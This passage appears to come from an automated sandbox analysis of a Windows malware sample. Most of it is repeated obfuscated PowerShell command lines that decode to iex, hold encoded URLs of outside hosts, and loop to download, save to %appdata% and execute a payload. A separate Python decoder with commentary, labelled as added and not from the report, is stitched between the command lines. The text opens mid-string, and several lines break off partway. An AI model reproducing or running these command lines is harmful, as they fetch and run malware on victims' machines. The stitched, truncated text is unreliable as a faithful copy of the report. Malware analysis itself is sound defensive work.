ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. 
,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
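The two command lines above share one string-stuffing scheme, and the decoder below, added here as an example and not taken from the report or from the malware, re-implements it so the literals can be recovered without executing anything. Indbandtes and Viscometres are the same function under different names: $Apocrisiary++ (or $Lotah++) on an unset variable yields 1, 'SUBsTR' + 'ing' assembles the method name Substring at run time so the word never appears in the script, and the loop takes Substring(i, 1) for i = 2, 5, 8, ... while i is less than Length - 1, so every real character is padded with two junk characters. Sloshily and Tilfredsstillelse invoke (with & and . respectively) whatever $Paprr and $Hemibasidiomycetes decode to, and both decode to iex. The sample literals are copied from the command lines above; $Hennes and $Milieuplanerne decode to User-Agent, $Jejune203 and $Arish to the > separator. One caveat for anyone decoding from this page: the report's HTML rendering has collapsed runs of spaces, and a literal whose padding contained two adjacent spaces (the $Velproevet User-Agent string, for one) no longer decodes correctly here, so work from the raw script block (the .bat, or the PowerShell 4104 event) rather than from the rendered report. The decode_calls helper and its regex are this example's own assumption about the call syntax, not something the report shows.

```python
"""Decoder for the character-stuffing scheme used by the PowerShell stage on this page.

Added example, not code from the report or from the malware. decode_stuffed
mirrors Indbandtes / Viscometres; decode_calls and its regex are this
example's own assumption about how the calls look in the script.
"""
import re


def decode_stuffed(blob, start=2, step=3, width=1):
    """Python equivalent of the loader's decoder.

    The PowerShell reads, with $Apocrisiary == 1 because ++ on an unset
    variable yields 1 (Substring is invoked by name, the name being built
    at run time from 'SUBsTR' + 'ing'):
        $Afrettere = $Forsimple.Length - $Apocrisiary
        For ($i = 2; $i -lt $Afrettere; $i += 3) { $out += $Forsimple.Substring($i, $Apocrisiary) }
    so the real text sits at offsets 2, 5, 8, ... and the last character of
    the literal (always a space in this sample) is never reached.
    """
    limit = len(blob) - width
    return "".join(blob[i:i + width] for i in range(start, limit, step))


# <decoder name> '<single-quoted literal>'; PowerShell single-quoted strings
# have no escapes other than a doubled quote.  Assumed call shape, not
# something the report states.
_CALL = re.compile(r"(?P<func>\w+)\s+'(?P<arg>(?:[^']|'')*)'")


def decode_calls(script, decoder_names):
    """Return (literal, decoded) for every call to one of decoder_names in script."""
    out = []
    for m in _CALL.finditer(script):
        if m.group("func") in decoder_names:
            literal = m.group("arg").replace("''", "'")
            out.append((literal, decode_stuffed(literal)))
    return out


# Literals copied from the two command lines in this report.  Only literals
# without two adjacent spaces are used, because the report's HTML rendering
# collapses runs of spaces and silently shifts the offsets of the others.
SAMPLE = (
    "$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';"
    "$Jejune203=Indbandtes 'Va>In ';"
    "$Paprr=Indbandtes 'B,iP,e hx H ';"
    "$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';"
    "$Arish=Viscometres 'Se>Re ';"
    "$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';"
)

# The cmd.exe one-liner the first script stages through $Ansvarsbevidsthed;
# only its prefix is trustworthy from the rendered page, for the reason above.
STAGING_CMD = r"FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul "

if __name__ == "__main__":
    for literal, decoded in decode_calls(SAMPLE, {"Indbandtes", "Viscometres"}):
        print(repr(literal), "->", repr(decoded))
    print(repr(decode_stuffed(STAGING_CMD)))
```

Run against a raw 4104 script block the same decode_calls pass recovers the URL list in $Reveled / $Bageriers and the %appdata% staging path as well; the decoder is kept separate from the call scanner so it can also be pointed at a single literal pulled from memory or from a Yara hit.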
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. 
SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.naJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. 
SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. 
,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 